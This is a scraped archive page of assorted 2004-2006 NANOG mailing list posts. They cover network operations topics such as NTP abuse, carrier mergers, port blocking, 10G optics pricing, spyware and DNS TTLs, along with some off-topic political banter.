I'm not quite comfortable with the idea of building a market audience based on data with at best dubious accuracy. On Mon, 15 May 2006, Martin Hannigan wrote: :At 12:49 PM 5/15/2006, Brian Wallingford wrote: : :cough scam_snake_oil_etc /cough : : :How so?
Re: Open Letter to D-Link about their NTP vandalism
Two concrete technical suggestions to mitigate the volunteered NTP server's usage issues at the DIX: (1) Have someone else anycast the DIX block, and NAT the incoming NTP requests to another NTP stratum-1 server (eg pool address(es)). Or a much better idea: (2) Renumber into a new /24, which is announced only at the DIX with no-export, so that only DIX members are able to reach the server - as was the intended usage of this NTP server in the first place. (The announcment can be made by anyone at the DIX, it is not strictly necessary that the NTP server be the announcer of the /24. And in fact, it need not be a /24, as the server should be the only occupant of the block - but it should not be covered by any globally visible aggregate, at least not one contiguous to the connectivity at the DIX.) As to the liability issue, it is easy enough to envision that someone, somewhere, is relying on time results from NTP for a life-or-death application, like a medical device, and is innocently an impacted third party in this. Sending bad NTP values could in theory be responsible for killing someone's scratch monkey... -- Brian Dickson Email: [EMAIL PROTECTED] http://www.chateau-briand.net Tel : +1 647 234 7282
Re: Welcome back, Ma Bell
Not that mind-boggling. The FCC under the Bush administration has been a joke from the get-go. (This coming from a very right-leaning independent). This is the ultimate shell game, considering ATT's antics last year. cheers, brian On Sun, 5 Mar 2006, Fergie wrote: : :Reuters and CNN/Money also reporting same: : : http://money.cnn.com/2006/03/05/news/companies/att_bellsouth/index.htm : :Mind-boggling. : :- ferg : : : :-- Suresh Ramasubramanian [EMAIL PROTECTED] wrote: : :This is from Dave Farber's list .. : : Subject: Everything old is new again : From: Kevin G. Barkes : : NEWS ALERT : from The Wall Street Journal : : ATT is planning to acquire BellSouth for roughly $65 billion. A : deal between the two could be announced as early as Monday. : :I somehow wonder if the old executives at Ma Bell had already worked :out a timeline for resurrecting her well before she was split up .. : :--srs :-- :Suresh Ramasubramanian ([EMAIL PROTECTED]) : : :-- :Fergie, a.k.a. Paul Ferguson : Engineering Architecture for the Internet : [EMAIL PROTECTED] or [EMAIL PROTECTED] : ferg's tech blog: http://fergdawg.blogspot.com/ : : : -- ___ Brian Wallingford Director, Network Operations MegaNet Communications, TCIX, Inc. ~~~
Comcast contact also.
Also looking for a Comcast contact for mail abuse issues. Please reply off-list. Brian.
RE: McDonalds contact also.
That is so funny. FWIW.. I did try to contact them on-line as well as via phone with no response. Sorry for wasting so much of someones time that spmming the list impersonnating me seemed like a good idea. I should forward this to spam-l and watch the trolls come out. LOL - Brian J. -Original Message- From: Buhrmaster, Gary [mailto:[EMAIL PROTECTED] Sent: Tuesday, January 31, 2006 2:03 PM To: Brian Johnson Subject: RE: McDonalds contact also. (I could not resist responding.) Sorry, you unsolicted idea will not be accepted: Unsolicited Ideas Thank you for your interest to share an idea for a product or service that you believe would be beneficial to McDonald's. Please know, however, that it is McDonald's company's policy not to consider unsolicited ideas from anyone other than our corporate employees, franchise owners and dedicated suppliers. It's not that great ideas cannot come from our valued customers. Each year, however, McDonald's receives thousands of unsolicited ideas and proposals for products and services. Due to the mass volume of these unsolicited ideas and the business challenge of determining what is truly a new idea versus a concept that is already in development, being tested, or previously considered, we must adhere to a strict policy not to accept or review any unsolicited ideas that come from outside the McDonald's system of our corporate employees, franchise owners and suppliers. As a result, we must decline your invitation to review your idea, and hope you can understand and appreciate our business reasons for making this company decision. We do, however, greatly appreciate your interest in McDonald's. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Brian Johnson Sent: Tuesday, January 31, 2006 6:25 AM To: nanog@merit.edu Subject: McDonalds contact also. I've got a great idea for a new cheeseburger and want someone to give me a contact at McDonalds. I am too lazy to find one myself, and don't care about wasting any of your time. Please reply off-list. Brian.
RE: Password Security and Distribution
Our company is starting to grow rather quickly and we are starting to have growing pains. We are in the need for a better mechanism for sharing passwords between our engineers. I wish there was a system that let you do the following: * Store and encrypt logins/passwords and access logs in a database * Assign permissions (add new logins/passwords, change password...) to those passwords on a per user/group basis, based on an existing authentication scheme (Windows AD, LDAP, Kerberos...) * SSL web frontend * Reporting. If a user leaves and you want to know which passwords he had access to or has ever accessed so you can change them, this would be really really nice. I've been playing around with Network Password Manager from www.sowsoft.com. It seems like the best product available in this area that I could find that makes sharing passwords kinda easy, but it's a service that runs on Windows, requires a Windows client software installation, and lacks any sort of reporting.
Re: [NANOG]Cogent issues
On 11/17/05, Eric Gauthier [EMAIL PROTECTED] wrote: Heya, Just to make analysis easier: Which prefixes should be missing? There seem to be larger problems, http://www.cogent.com returns: Error 404 Not found The host name in the URL you have requested www.cogent.com does not match any virtual server currently running. This maybe because you entered the host name incorrectly, or that the necessary server alias has not been setup. Powered by Zeus Web Server A whois cogent.com returns: Registrant: Cogent Investment Operations Limited 55 Moorgate London EC2R 6PA UK Domain Name: COGENT.COM Administrative Contact: MOITRIER, Regis [EMAIL PROTECTED] BNP PARIBAS 10 Harewood Avenue 4 R 240 London NW1 6AA UK +44 207 595 6777 fax: +44-207-595-5090 Technical Contact: BNP PARIBAS [EMAIL PROTECTED] 10 Harewood Avenue - David Gardner 4R305 London NW1 6AA UK +44 207 595 2000 fax: 123 123 1234 Record expires on 11-Apr-2012. Record created on 11-Apr-1999. Database last updated on 17-Nov-2005 10:57:46 EST. Domain servers in listed order: NS1.BNPPARIBAS.COM 155.140.125.131 NS3.DOMIVESTA.NET159.50.101.80 NS2.BNPPARIBAS.COM 155.140.125.121 NS4.DOMIVESTA.COM159.50.203.80 -Brian
Re: [NANOG]Cogent issues
On 11/17/05, Brian Kerr [EMAIL PROTECTED] wrote: There seem to be larger problems, http://www.cogent.com returns: Error 404 Not found Pay no attention, I apparently don't know what I'm doing.
Cisco Cache Engine Log Applications?
Hello, Does anyone have any experience or suggestions on Cisco Cache Log Analyzing/Reporting tools? Ive downloaded Sawmill which isnt too bad but I would like to evaluate a couple more. Windows and Open Source apps are possible candidates. Any help would be greatly appreciated. Thanks, Brian
Cisco Cache Engine Log Applications?
Hello, Does anyone have any experience or suggestions on Cisco Cache Log Analyzing/Reporting tools? Ive downloaded Sawmill which isnt too bad but I would like to evaluate a couple more. Windows and Open Source apps are possible candidates. Any help would be greatly appreciated. Thanks, Brian
Time Warner Outage?
Anyone having problems with Time Warner?
alternative to baytech rpc
We are looking for an alternate vendor for the following RPC capable PDU's: 30amp - 110volt - L5-30P plugs Anyone have suggestions? Baytech is great but we are going to have big problems with supply and our gear is already backordered 2mo. Registrant: Bay Tech 200 North 2nd Street Bay St. Louis, MS 39520 US
RE: New N.Y. Law Targets Hidden Net LD Tolls
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of David Lesher Sent: Thursday, August 18, 2005 8:31 AM To: nanog list Subject: Re: New N.Y. Law Targets Hidden Net LD Tolls Pardon my ignorance, but don't most phone companies require 10 digit dialing for long-distance. We have similar situations in the rural area I live in, but the customers know if they dial more than 7 digits, it WILL be long distance. No. If you are in an overlay area, such as MD, parts of NoVA and many other states; then 10D is required for ALL local calls MD does have 11D required for toll; but many states do not, inc. Virginia. (This topic is the vs vs emacs of the telco world, btw. I'm strongly in the 11D for toll camp, but others I respect [Hi Mr. Mayor] feel it's a PITA to dial 10D on every call..) This may have been inspired by ISP-set POP #'s. In a case I know of; a WebTV user did the setup via the 800#; and got told 867-5309 was local and it was automagically loaded into the WebTV box. 90 days later, the phone bill arrived... Now on this one, throw the book at WebTV. If you are gonna make the settings for the customer, you are responsibe for the results of your actions. But, of course, I'm sure they have a disclaimer saying that it is your responsibility to insure the number selected is a local call. - Brian J
Way OT: RE: @Home's 119 domain names up for sale
Holy communist manifesto batman! Let's let the government fix everything. Hold on, hasn't that been tried already? Oh yeah the USSR. That was a blazing success. Conservatives generally aren't against the government helping in areas NO ONE ELSE CAN. It is obvious to everyone involved that the government largely screws up these sorts of initiatives and most of the money ends up wasted anyways. It's these pork projects that kill us. - Brian J. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Matthew Black Sent: Thursday, August 11, 2005 11:15 AM To: nanog@merit.edu Subject: Re: @Home's 119 domain names up for sale I remember @home.com as being one of the defunct domains for which we always had outbound e-mail queued. But exactly how is this bill related to the domain name sale other than the fact that your press release snippet contains the text string [EMAIL PROTECTED] Your post doesn't make that clear. Our government spends money on myriad of initiatives. Conservatives like to decry government spending as a total waste of resources. Keep in mind that every dollar spent by the government goes back into the economy, whether it be money to the oil industry (ala the new Energy Bill, money to Halliburton for Iraq operations), or low-income housing. The point is that the money goes back to citizens in the form of jobs, subsidized purchases (which help business sell items and services and create more jobs), or in the form of tax breaks to extremely wealthy individuals. Contrary to the rhetoric, the money doesn't vanish down a sinkhole. matthew black california state university, long beach Note: The opinions stated herein represent only myself and other like-minded individuals and may not represent my employer. On Wed, 10 Aug 2005 12:09:59 -0500 Frank Coluccio [EMAIL PROTECTED] wrote: re: @Home's 119 domain names up for sale Interesting that you'd bring this up. The federal pork trasfer of $1 Billion that was announced on Sunday to bridge the digital divide references an [EMAIL PROTECTED] program as a part of its underpinning. From: http://press.arrivenet.com/pol/article.php/679032.html ---snip: LISC/NEF and One Economy Launch $1 Billion Initiative to Bridgethe Digital Divide; Sen. Hillary Clinton Helps Unveil Initiative Sunday, August 07, 2005 Contact: Leslie Kerns of Solomon McCown Co., 617-933-5013 or [EMAIL PROTECTED] or Susan Sheehan of Vogel Communications, 503-449-1666 or [EMAIL PROTECTED] NEW YORK, Aug. 7 /U.S. Newswire/ -- Efforts to close the technological gap between America's haves and have-nots will get a boost this week. Local Initiatives Support Corp. (LISC) and its subsidiary the National Equity Fund (NEF) are partnering with One Economy to launch [EMAIL PROTECTED], a $1 billion initiative that will build more than 15,000 affordable homes with high-speed digital Internet connectivity and provide low-income families personal access to computers and technology services. The initiative expects to connect nearly 100,000 people to the vast advantage of the Internet. ---end snip It makes for some interesting reading for those of you tracking where your tax dollars are going. I'd be interested in reading some comments on this initiative, either on the board or by email. [EMAIL PROTECTED] = On Wed Aug 10 16:44 , Fergie (Paul Ferguson) sent: I know this is horribly off-topic, but seeing a reference to @Home kind made me a little nostalgic. :-) [snip] Apparently former high-speed Internet provider [EMAIL PROTECTED] once felt likewise. But At Home Liquidating Trust, successor to the once high-flying Internet darling [EMAIL PROTECTED], said Wednesday it is selling the former broadband company's 119 domain names. [snip] http://news.com.com/ExciteHomes+119+domain+names+up+for+sale/2100-1030_3-582 6807.html
RE: Way OT: RE: @Home's 119 domain names up for sale
Don't get me wrong. They aren't all bombs. ;-) - Brian J. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of J.D. Falk Sent: Thursday, August 11, 2005 12:04 PM To: nanog@merit.edu Subject: Re: Way OT: RE: @Home's 119 domain names up for sale On 08/11/05, Brian Johnson [EMAIL PROTECTED] wrote: Conservatives generally aren't against the government helping in areas NO ONE ELSE CAN. It is obvious to everyone involved that the government largely screws up these sorts of initiatives and most of the money ends up wasted anyways. It's these pork projects that kill us. The Internet started out as a pork project. I'm just sayin'. -- J.D. Falk a decade of cybernothing.org [EMAIL PROTECTED] registered 24 June 1995
RE: Way OT: RE: @Home's 119 domain names up for sale
OK. Wasted was a poor choice of words, but even if the money does get back to the people in some way, it is not doing so in a way that really accomplishes something. Private companies do not invest in something that will not have a return that benefits them. Political spending sometimes will have no return other than political capital. It's like buying candy. You can buya a ton of it, and either eat it or give it away, but in the end it will be gone and very little will be accomplished other than the kids who now love you for doing it. So wasted was a bad term to use. How about used with little return if any. - Brian J. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Matthew Black Sent: Thursday, August 11, 2005 1:20 PM To: nanog@merit.edu Subject: Re: Way OT: RE: @Home's 119 domain names up for sale On Thu, 11 Aug 2005 11:57:25 -0500 Brian Johnson [EMAIL PROTECTED] wrote: Holy communist manifesto batman! Let's let the government fix everything. Hold on, hasn't that been tried already? Oh yeah the USSR. That was a blazing success. Conservatives generally aren't against the government helping in areas NO ONE ELSE CAN. It is obvious to everyone involved that the government largely screws up these sorts of initiatives and most of the money ends up wasted anyways. It's these pork projects that kill us. - Brian J. Wasted? Please elaborate. It's not like the money vanishes. The money goes somewhere, usually to pay non-government salaries. Corporate Amerika is wasteful too: WorldCom, Global Crossing, Enron, and Halliburton. These are companies that hurt the lives of millions of Americans, including 40,000,000 citizens of California who pay double the national average for electricity because Enron gamed the system. We pay 15 cents per kilowatt! That wasn't completely the government's fault. matthew black california state university, long beach Note: Options expressed are mine and do not necessarily represent my employer.
Re: what will all you who work for private isp's be doing in a few years?
As an economist I know likes to say: It depends. To a varying extent (in some markets more than others), the massive oversubscription of cable that meant poor bandwidth/latency at peak times has declined to the point where the older arguments of committed versus max is less meaningful. Of course in some places it's still terrible, but not everywhere. Besides, distance and crappy phone lines can make a chump out of DSL as well. Also, let's be careful when we talk about the typical user and whether they understand the difference. The typical user may simply not even care, even IF they know the difference. In fact, many that do know the difference may prefer (for whatever reason), to take the higher max of cable, especially if in their neighbourhood that max is achieved quite frequently. Further, who's to say that at some point the cable companies won't start offering minimum guaranteed bandwidth? I doubt they will, but if they were to, then a big advantage of DSL falls apart. Let's also not forget that many of us (myself included), choose not to procure landlines. This can be an extra $10-$30/month on top of the ISP charges. That's a big part of why I have cable at home, and I know others in the same situation. Sure, Oceanic/Earthlink here is worthless - took me 2 weeks to get an install time, and then the lead time on that is 3 weeks (1 week from this Saturday at this point..). But who cares? I'm using someone's open wifi. - bri Shane Owens wrote: On this I am wondering what the user market would chose with an offer from a DSL provider of a guaranteed bandwidth purchase with a contention based cap on max speed. For example DSL sold with a guaranteed bandwidth availability of 256K (or 512K, 768K etc based on 256K increments) with a up to maximum of 7-10Mbps. Would the typical user understand the difference between this the standard Comcast marketing of up to speeds without any service guarantee? Shane It won't be long before the telco's respond by offering DSL at the same speed/price. I've heard (but don't *know*) that SBC is selling 6 down and 1 up in Houston and Dallas for $35. We're doing a fair business selling accelerated dial up for $15. Its surprising how many folks don't want broadband. You don't need 4mb down to read your email. And once you get outside of the city limits there's a good sized market that can't get any type of broadband, especially cable. We may decline some, but I don't think that ISP's are going away anytime soon. Bob Martin -- Brian Russo [EMAIL PROTECTED] (808) 277 8623
Re: what will all you who work for private isp's be doing in a few years?
For every day a company does the same thing they did yesterday, they will be in business one day fewer ... or something like that, - bri Matt Bazan wrote: bottom line is that in a few years everything will be virtualized and cosolodation will rule the land. there will be single turnkey solutions for the end user / corporate environment that will be infinitely configurable to meet the latest trends and needs. there will be no use for the small time 'innovator' or 'player' except in a purely academic environment. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Mark D. Bodley Sent: Wednesday, May 11, 2005 2:44 PM To: 'Stephen J. Wilcox'; Matt Bazan Cc: [EMAIL PROTECTED] Subject: RE: what will all you who work for private isp's be doing in a few years? Matt, your questions seem extremely prejudiced to a determined outcome. In my opinion resellers are in the long run going to lose because of lack of tangible assets (there is my Bias, on the table. I have my own facilities, and equipment). However because pure resellers lack the facilities they can be resellers(and often are) of whatever the technology of the day is. Strangely, many resellers, grow into facilities based carriers, but if they do not, then they can always move to the next thing. If you sold ISDN, in the 90's, and you knew how to walk someone through configuring their pipeline, you were better than Bell (read PSI Net). If you could accurately test, and deliver DSL, to a client 3-5 years ago, (read COVAD) you were better than Bell. In the future, who knows what it will be, (my bet is wireless, and we all cook like chickens in a Showtime rotisserie) the prevailing trait of those that have been in this for a long time is adaptation. There was a day when selling access off an ISDN connection was doable. I got out of the straight access market in the late 90's. I provide, and resell connectivity, with static routes to applications I host, or maintain. Hopefully the straight resellers of today will be selling microwave, or implant connectivity, or whatever in a few years. Bottom-line public or not, Mom, and Pop, or not no matter what you do in this business you have to be ready to adapt. If you are huge and don't catch the next wave you could be just as dead as the smaller guys that don't catch that next wave. Mark D. Bodley President Cyrix Systems [EMAIL PROTECTED] www.cyrixsys.com -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Stephen J. Wilcox Sent: Wednesday, May 11, 2005 4:12 PM To: Matt Bazan Cc: [EMAIL PROTECTED] Subject: Re: what will all you who work for private isp's be doing in a few years? On Wed, 11 May 2005, Matt Bazan wrote: why in the world would anyone want to purchase dsl from a private reseller when i can get 4mb down 384 up from comcast for $25? think you dsl resellers out there are doomed. in fact, just a matter of time before most of you isps are down the toilet. im reminded of the mom and pop grocery store phenomenon that has now been replaced by the kohls, ap, whole foods etc. of course there will always be niche markets but this is less applicable for a pure commodity like bandwidth. yeah, i suppose you'll say something about value added services and such and you may have a point but i doubt that will keep the ship afloat for long. Matt, first whats your affiliation and experience in this arena? That these markets exist and more profitably so than the large carriers suggest the problems you are raising dont exist. What is your theory based on, you only cite your personal preference to buy from Comcast which cannot be said to be indicative of the market. Grocery stores are not comparable, this is a different industry and different market. Also bandwidth is not a pure commodity, and DSL is not pure bandwidth. I think your argument is at best uninformed, at worst non-existent.. you need to provide some references, examples, figures, whatever.. else this is little more than trolling. Steve -- Brian Russo [EMAIL PROTECTED] (808) 277 8623
Re: Blocking port udp/tcp 1433/1434
End to end, but I'm afraid current realities do not always permit that approach and we must occasionally build walls. Sure, I wish people would fully step up to the plate and demand robust software/protocols. Secure, strong encryption and software that isn't filled with buffer overflows and other ludicrously should-be-over-the-hill bugs. Etc etc.. This is the part where the crickets chirp, and everyone laughs at me. So, if people want to screw up their own machines in isolation, that's fine but when it takes down half your network - bri [EMAIL PROTECTED] wrote: On Thu, 12 May 2005 04:15:07 -1000, Brian Russo said: Is there now justification for allowing transit for ms-sql slammer ports? That depends. Do you believe in end-to-end or walled-garden? -- Brian Russo [EMAIL PROTECTED] (808) 277 8623
RE: Heads up: Long AS-sets announced in the next few days
James [mailto:[EMAIL PROTECTED] wrote: They are not playing with the core. The result of what they are doing is dependent on specific topology and level of direction they are throwing prefixes at. While I will not dispute your statement, I believe that every ASN should be responsible of their own and should not trust the General Internet to not cause harm on their network. If your router is going to crash b/c of someone advertising an unusual AS_PATH, I don't view that differently from a box getting owned because it was running unpatched OS since 1999 without any firewall rules either. -J I think most of the concern comes from the fact that this experiment is being done on a network that many people rely upon for various reasons, and it's unknown side effects have are in the scope of global financial/communication/emergency crisises. It might not cause any harm, but I'd think you guys could have probably come up with a better test bed than using other people's equipment and networks without permission and risking unforseen disasters. Why wasn't this experiment tested in a lab environment? We don't test new pharmaceuticals directly on humans in the first round of testing, and after they've been proven safe on animals, the tests then go on to compensated volunteers Even if this type of experiment fell into compliance with the RFCs, it surely wasn't the intended use of AS-PATHS and should be considered experimental, and therefore tested in a lab setting. The risks imposed by using the global internet routing infrastructure as your testbed far outweigh any benefits your tool might realize. If this experiment that you're running causes downtime for someone elses systems, are you willing to pay for the damages? -Brian
RE: Goofle/Sprint having problems?
France Telecom... On Fri, 19 Nov 2004, Vandy Hamidi wrote: Problem is fixed. Looks like a quick patch was put into place. Who is opentransit.net? 3 5 ms 5 ms 5 ms sl-gw27-stk-4-4-TS5.sprintlink.net [144.228.107. 4 5 ms 5 ms 5 ms sl-bb21-stk-9-0.sprintlink.net [144.232.4.245] 5 8 ms 8 ms 8 ms sl-bb24-sj-9-0.sprintlink.net [144.232.20.181] 6 9 ms 9 ms 9 ms sl-st21-pa-15-1.sprintlink.net [144.232.20.40] 7 9 ms 9 ms 9 ms sl-franc2-6-0.sprintlink.net [144.223.243.82] 8 9 ms 9 ms14 ms Google-EU-Customers.GW.opentransit.net [193.251. 910 ms10 ms10 ms 216.239.48.174 1011 ms10 ms11 ms 216.239.48.214 1119 ms16 ms11 ms 216.239.48.210 1211 ms10 ms10 ms 216.239.49.168 1311 ms12 ms11 ms 216.239.49.2 1410 ms19 ms16 ms 216.239.57.99 Trace complete. H:\ -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul G Sent: Friday, November 19, 2004 2:43 PM To: [EMAIL PROTECTED] Subject: Re: Goofle/Sprint having problems? - Original Message - From: Sean Donelan [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, November 19, 2004 5:38 PM Subject: RE: Goofle/Sprint having problems? On Fri, 19 Nov 2004, Vandy Hamidi wrote: Yeah, a visual route just showed my trace going to AUS and then Singapore. Hmm... You think Google is going to be pissed when they find out their site was being routed to Asia? Heads will roll... (lawsuit?) NANOG recuring topic thread #4 Gee, maybe there should be a registry of authorized routes and who they belong too that ISPs could check. We could even call it the Internet Routing Registry. ... and we could then make fun of those few (sic/sar) that don't filter based on that data on a mailing list we could call nanog-l. paul --- paul galynin
Cisco 6509 DC Power Supplies...
I have 2 6500 DC Power Supplies I don't need anymore. They are FREE to a good home! I'd prefer someone to just pick them up locally to me, they are in the Ashburn Equinix facility. If anyone is interested, drop me a line. They are pretty much brand new and work fine, they are not for shooting or blowing up (although I have a old switch if you are looking for something to destroy). Thank You, Brian W. Gemberling
Re: Okay, I'm just going to _assume_...
It's official - pigs are aloft, the forecast for Hell is freezing rain, the Sox have nearly broken the Curse (and will... :), and Cisco has taken over Looney Tunes. The end is near. No, no operational content... Did John Chambers have an aneurysm recently? On Thu, 21 Oct 2004, Bill Woodcock wrote: : :...that there's some operational content somewhere in here: : :http://www.cisco.com/edu/peterpacket/ : :...though I'm on kind of a slow link, so I'm still looking. My eternal :thanks to Suresh for finding this. My day is complete. : :-Bill
Re: FW: The worst abuse e-mail ever, sverige.net
:Let's put this in perspective. Say a hypothetical sysadmin were to :disable any and all authentication on his SSH server. And that :someone then used SSH from your network to run code that sysadmin :didn't like on that machine. Would you then consider it reasonable if :the sysadmin proposed: : : The only responsible thing to do is filter port 22, smarthost for : your users, and inform them about using the alternate submission : port with authenticated SSH in order to work with enterprise SSH : servers - or IPSec VPNs, for that matter. This is simply the best : practice, at this point in time. : Apples oranges; thanks for playing, please try again...
Lucent/Ascend/Cascade B-STDX images
I've exhausted all my resources, and have not found a definitive method for upgrading a production switch from cp40 to cp50. Is it as simple as hot-swapping the standby, ignoring the capability mismatch, changing the active cp, then doing the same for the master cp? Also, curious if the images for these blades are interchangeable. Any input would be most appreciated. cheers, brian
Re: Hurricane Frances impacts
:The networks in Broward, Palm Beach, Martin, Brevard counties appear to :be the most impacted. Cellular had problems due to wireless sites being :without power. The wireless industry brought in 500 new generators in :advance of the hurricane, but needed to wait until the hurricane passed :before sending them out to the cell sites. Miami and Orlando also have :sites down due to power issues and connectivity to local carriers. : :The various local access line providers in Florida, Florida has a lot of :tiny LATAs and phone companies, report some access lines are down but :haven't published any counts. Cable networks have the same issues with :local cable service. No reports of damage to telephone central offices or :cable headends. : :Due to power outages and local access network problems, bank networks and :cash machines are out of service in most of the affected counties. : :No reports of problems to any NAPs, POPs, data centers or fiber trunks. :They generally have permanent generators. So if you have local :connectivity, Internet access is working. Streaming audio/video from :Florida television and radio stations over the Internet did not have any :problems. Any details on the status of natural gas lines in FL, and approximately how many facilities use such for generator power vs diesel?
RE: Senator Diane Feinstein Wants to know about the Benefits of P 2P
Akamai or not, microsoft is overwhelmed by the demand for SP2, and today is giving the message listed below on windowsupdate: Download and install it now - Currently not available We are currently experiencing a high level of demand for Windows XP Service Pack 2, so please check back later for availability. We apologize for any inconvenience. If you prefer to obtain SP2 another way, the easiest way to get Service Pack 2 is to turn on the Automatic Updates feature in Windows XP and it will be downloaded when you are connected to the Internet without you having to take any further action. So then I thought about getting it from the torrent at sp2torrent.com, but sadly microsoft has made them remove the torrent... -Original Message- From: Byron L. Hicks [mailto:[EMAIL PROTECTED] Sent: Monday, August 30, 2004 3:21 PM To: Jeff Wheeler; Henry Linneweh Cc: [EMAIL PROTECTED] Subject: Re: Senator Diane Feinstein Wants to know about the Benefits of P2P Not true. For those of us who host Akamai servers, we could download SP2 with no problems. We did not need P2P, or MSDN. In fact, I would be very reluctant to trust a Windows update downloaded via P2P. -- Byron L. Hicks Network Engineer NMSU ICT On 8/30/04 12:43 PM, Jeff Wheeler [EMAIL PROTECTED] wrote: My two cents: When Windows XP SP2 was released the only way to get it (for those of us not part of MSDN at least) was via P2P. The same has been true for countless other large but important software releases on various platforms (particularly ones like Linux that aren't backed by huge corporations with tons of bandwidth to host these sorts of files). Point is? P2P is extremely valuable for the timely and cost-effective delivery of critical updates to the masses. -- Jeff Wheeler Postmaster, Network Admin US Institute of Peace On Aug 30, 2004, at 2:27 PM, Henry Linneweh wrote: So I would like some professional expert opinion to give her on this issue since it will effect the copyright inducement bill. Real benefits for production and professional usage of this technology. -Henry
Re: optics pricing (Re: Weird GigE Media Converter Behavior)
Title: Re: optics pricing (Re: Weird GigE Media Converter Behavior) Actually, (and this is from memory from a couple of years ago), most of the reason for cost of optics on 10G interfaces is simply *physics* (and the technology of component production at the current state-of-the-art level). (If any of the people questioning the pricing had bothered to look into *cost* (you know, that input thing before mark-up), or done any reading (and light reading doesn't count ;-)), you'd already know the reasons.) What it boils down to, is that the way solid-state on-chip lasers are made, for 1.0 GHz (really 933 MHz, IIRC), or even 2.5 GHz, fundamentally doesn't work for 10Ghz. It's because they are *lasers*, where component accuracy is really critical, and at 10Ghz, it crosses a threshold that likely won't be solved until someone clever invents some new way of doing things, or until nanotech becomes nanotech (without the quotes). And the VSR 10G, is really a misnomer. What it is, is 10 x 1.25 GHz parallel interface with fibre-optic ribbon cables. The 10 is so they can build in some hardware redundancy in case of failure, and also to improve the yields and infant mortality rates on production of the chips. Basically, 1.25 GHz (or maybe it's 1.125? It's been too long) are easy to do, with current-generation chip-production technology. 10Ghz optics are old-school lasers, several orders of magnitude larger, much more power-hungry, delicate, and in all likelyhood, hand-crafted with low yields. They really are that expensive. Just check out the price on 10G transponders (eg DWDM equipment) if you don't believe that's the case... On the other hand, it'd be nice to see a copper 10GBIC, even if its max cable length were a few metres. ;-) Keep in mind, I'm following standard NANOG methodology and quoting old information without checking my facts against current reality. :-) Your mileage (or cost) may vary, as they say. -- Brian Dickson Arbinet
RE: optics pricing (Re: Weird GigE Media Converter Behavior)
Title: RE: optics pricing (Re: Weird GigE Media Converter Behavior) Aha. It appears I was correct in framing my knowledge as out-of-date. :-) It looks like the technology *has* advanced, and that 10GE on MMF or SMF, single-channel, is what the current state of the art is, and at the $2k-3k unit price. In which case, yes, not offering this (and not building cards to use cheaper and/or more flexible component, ie XENPAK), is likely going to be a huge mistake Cisco. Unless they bite the bullet and do whatever it takes to make xenpak-based 10G cards, on at least some flavour of card on any 10G platform. (I don't really expect a xenpak-compatible version of soho routers to show up, although it *would* be nice as an option on most of their switch families.) So, I sit corrected. ;-) BTW, thanks for pointing this out; it's nice to see that things haven't completely stagnated in the last couple of years. Brian P.S. At that price level, I actually *do* expect another Swede will have, or already has, one or more of this class of box at home. In his WC, even. ;-) P.P.S. He's not crazy. But he *should* have a t-shirt that says I'm with STUPI. ;-) -Original Message- From: Mikael Abrahamsson [mailto:[EMAIL PROTECTED]] Sent: Sunday, August 29, 2004 12:08 PM To: Dickson, Brian Cc: [EMAIL PROTECTED] Subject: Re: optics pricing (Re: Weird GigE Media Converter Behavior) Then why can I purchase 10km 10GE Xenpaks directly from the manufacturer for under $2000? On the other hand, it'd be nice to see a copper 10GBIC, even if its max cable length were a few metres. ;-) There is one. It's called CX4 and has a reach of 15 meters. Cisco sold it for $600 list price at first but it has now disappeared from the price list. I don't know why. http://www.cisco.com/en/US/products/hw/modules/ps4835/products_data_sheet09186a008007cd00.html -- Mikael Abrahamsson email: [EMAIL PROTECTED]
verizon postmaster contact?
Can someone with verizon mail/postmaster group get in touch with me. thanks, - bri -- Recursivity. Call back if it happens again.
RESOLVED, was Re: problems accessing 128.171.*
Cheers to everyone who mailed me, apparently was a pccwbtn and/or alter.net issue. Now resolved. thanks, - bri At Mon, Aug 02, 2004 at 05:56:04PM -0400, Brian Russo wrote: Is anyone else having problems accessing 128.171.* (hawaii.edu) - bri -- Recursivity. Call back if it happens again. -- Recursivity. Call back if it happens again.
Re: 2511 line break
Title: Re: 2511 line break (Ob Humor: I read nanog via the web-based archive. Randy doesn't have a .signature. I *was* going to google for his email. Such irony, timing.) IIRC, 2511's look the same as the aux on any Cisco box. For those, it is CTRL-carat x, where carat is '^', shift-6 on most western keyboards. Be careful not to just hit return next, since that is continue to telnet, defeating your correct break sequence's intentions. briand
RE: VeriSign's rapid DNS updates in .com/.net
Petri Helenius wrote: What would be your suggestion to achieve the desired effect that many seek by lower TTL's, which is changing A records to point to available, lower load servers at different times? On a similar note (and not viewing the issue through the usual spam-colored glasses): Some people are using low dns TTLs in disaster recovery setups, so that in the event of a disaster at a primary site, services can be switched over to new servers at a secondary site via easy and fast DNS changes? If the TTLs are too long, all the cached records will continue to point at the servers which might no longer exist -- until they expire. This is another situation where low TTLs can be beneficial. Are there any other uses for low dns TTLs that haven't been brought up in this thread? And what is a low TTL being classified as? 30 minutes? 10 minutes? 5 minutes? -Brian
RE: Spyware becomes increasingly malicious
Alexei Roudnev wrote: It is not a bug; it is specially designed IE feature. MS always was proud of their full automation - install on demand, update automatically, add new software to start at a startup without need to be system admin, etc etc... As a result, we have a field full of bugs, pests, pets, spiders, spies and so on... They have _exactly_ what they designed. No one even bored to ask me 'do you want to allow this registry change' , because 'MS believe that their users are lamers so everything must be automated from the beginning to the end'... Most of the lastest versions appear to install themselves using the ByteCode Verifier vulnerability in the Microsoft Virtual Machine. Fully patched systems don't get the stuff installed. I'm sure the authors are working on newer injection methods Though the blame might be placed on Microsoft for having a flaw in their code, this wasn't part of any IE feature. You can read more about this exploitable bug (not feature) at http://www.microsoft.com/technet/security/bulletin/MS03-011.mspx I do not blame MS, but what about spyware on MAC-s - is it so easy to write and install spyware there? I don't really want to get into the argument of why people choose microsoft products to attack, but if someone was going to choose a product to attack, from which they were going to try and make the most money/impact off of, do you think they would choose the product with the largest user base? I 